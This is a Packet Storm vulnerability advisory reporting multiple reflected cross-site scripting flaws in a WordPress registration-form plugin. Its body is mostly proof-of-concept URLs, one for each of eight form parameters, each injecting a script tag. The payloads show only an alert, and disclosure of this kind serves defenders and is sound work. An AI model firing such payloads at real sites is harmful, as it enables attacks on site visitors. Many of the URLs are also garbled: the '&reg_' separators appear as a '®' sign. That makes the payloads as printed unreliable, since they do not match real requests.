WordPress Custom Frontend Login Registration Form plugin version 1.01 suffers from multiple cross site scripting vulnerabilities.
2f11147bfad36e5d36f6e32c8fdda833f458c752b0028154d051337b801da16d
========================================================================================
Custom Frontend Login Registration Form v1.01 (WP Plugin) - Multiple XSS Vulnerabilities
========================================================================================
____________________________________________________________________________________
# Exploit Title: Custom Frontend Login Registration Form (WP Plugin) - Multiple XSS Vulnerabilities
# Date: [11-13-2018]
# Category: Webapps
____________________________________________________________________________________
# Author: Socket_0x03 (Alvaro J. Gene)
# Email: Socket_0x03 (at) teraexe (dot) com
# Website: www.teraexe.com
____________________________________________________________________________________
# Software Link: https://wordpress.org/plugins/custom-frontend-login-registration-form
# Plugin: Custom Frontend Login Registration Form
# Version: v1.01 (last version)
# File: Registration Form
# Parameters: reg_bio, reg_email, reg_fname, reg_lname, reg_name,
nickname, reg_password, and reg_website.
# Language: This application is available in English language.
# Plugin Description: A WordPress plugin that an administrator can use to create
login forms and custom registration forms; then, after creating those forms,
an admin can use a shortcode to place a login/registration form on a page or post.
____________________________________________________________________________________
# Cross-Site Scripting Vulnerabilities:
Registration Form - Parameter: reg_bio
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=®_password=®_nickname=®_fname=®_name=®_bio=qadoh"><script>alert(1)<%2fscript>b7sb3m2scdh®_submit=reg_submit%3dRegister®_lname=
Registration Form - Parameter: reg_email
http://www.website.com/wordpress/index.php/registration-form/?reg_email=i1brx"><script>alert(1)<%2fscript>ee1c8o5kj1l®_website=®_password=®_nickname=®_fname=®_name=®_bio=®_submit=reg_submit%3dRegister®_lname=
Registration Form - Parameter: reg_fname
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=®_password=®_nickname=®_fname=r3mo6"><script>alert(1)<%2fscript>v4q2lzsnk7m®_name=®_bio=®_submit=reg_submit%3dRegister®_lname=
Registration Form - Parameter: reg_lname
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=®_password=®_nickname=®_fname=®_name=®_bio=®_submit=reg_submit%3dRegister®_lname=ahrpv"><script>alert(1)<%2fscript>z50y4k9db7m
Registration Form - Parameter: reg_name
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=®_password=®_nickname=®_fname=®_name=fi8ze"><script>alert(1)<%2fscript>j8rjcha5rvf®_bio=®_submit=reg_submit%3dRegister®_lname=
Registration Form - Parameter: nickname
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=®_password=®_nickname=v0g30"><script>alert(1)<%2fscript>qm20vz35hbz®_fname=®_name=®_bio=®_submit=reg_submit%3dRegister®_lname=
Registration Form - Parameter: reg_password
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=®_password=nn3du"><script>alert(1)<%2fscript>aopv3zr72k7®_nickname=®_fname=®_name=®_bio=®_submit=reg_submit%3dRegister®_lname=
Registration Form - Parameter: reg_website
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=io8na"><script>alert(1)<%2fscript>iuotdm7w5i2®_password=®_nickname=®_fname=®_name=®_bio=®_submit=reg_submit%3dRegister®_lname=
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed